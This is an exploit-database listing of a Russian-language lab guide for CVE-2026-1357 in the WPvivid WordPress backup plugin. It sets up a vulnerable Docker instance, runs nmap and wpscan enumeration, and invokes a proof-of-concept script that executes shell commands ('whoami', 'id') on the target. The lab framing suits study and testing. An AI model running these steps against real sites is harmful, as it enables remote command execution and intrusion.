Sploitus

Exploit for CVE-2026-1357

kitploit · 2026-08-27

Exploit Code

MARKDOWN44 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CVES-LABS-CVE-2026-1357
# CVE-2026-1357

Лабораторная среда для CVE-2026-1357

# 1\. Сборка окружения

sudo apt update && sudo apt install docker.io docker-compose -y

sudo systemctl start docker

git clone [Link of Repo]

wget https://downloads.wordpress.org/plugin/wpvivid-backuprestore.0.9.123.zip

unzip wpvivid-backuprestore.0.9.123.zip

sudo docker-compose up -d

В FireFox:

http://localhost

Название сайта: Admin Cyber-Hub

Имя пользователя: Admin

Пароль: anything

Email: some-email@example.com

# 2\. Эксплуатация уязвимости:

Активируйте плагины и ключ в WordPress

pip3 install requests pycryptodome --break-system-packages

nmap -sV -sC localhost

wpscan --url http://localhost \--enumerate p --plugins-detection aggressive

python3 poc.py -u http://localhost -c "whoami"

python3 poc.py -u http://localhost -c "id"